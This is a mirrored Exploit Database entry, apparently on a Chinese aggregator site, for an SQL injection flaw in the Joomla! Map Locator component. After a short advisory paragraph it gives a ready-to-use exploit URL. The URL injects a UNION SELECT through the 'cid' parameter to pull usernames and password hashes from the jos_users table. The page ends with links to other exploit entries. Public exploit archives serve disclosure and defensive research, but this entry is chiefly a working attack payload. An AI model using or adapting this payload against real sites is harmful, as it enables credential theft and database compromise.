Joomla! Component Map Locator – ‘cid’ SQL Injection

Exploit Database
123 阅读

作者： FL0RiX

日期： 2011-05-23
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/35788/

source: https://www.securityfocus.com/bid/47941/info

The 'com_maplocator' component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

http://www.example.com/index.php?option=com_maplocator&view=state&cid= null+AND+1=0+union+select+1,2,concat(username,0x3a,password)fl0rix,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+jos_users--

last Exploits
Joomla! Component Map Locator – ‘cid’ SQL Injection的更多信息

TSOKA:CMS 1.1/1.9/2.0 – SQL Injection / Cross-Site Scripting：
MACCMS 10 – Cross-Site Request Forgery (Add User)：
Intern Record System v1.0 – SQL Injection (Unauthenticated)：
WordPress Plugin SP Client Document Manager 2.4.1 – SQL Injection：
WordPress Plugin WP Jobs < 1.5 - SQL Injection：
WordPress Plugin Users Ultra 1.5.50 – Persistent Cross-Site Scripting：
WordPress Theme Diary/Notebook Site5 – Email Spoofing：
Altenergy Power Control Software C1.2.5 – OS command injection：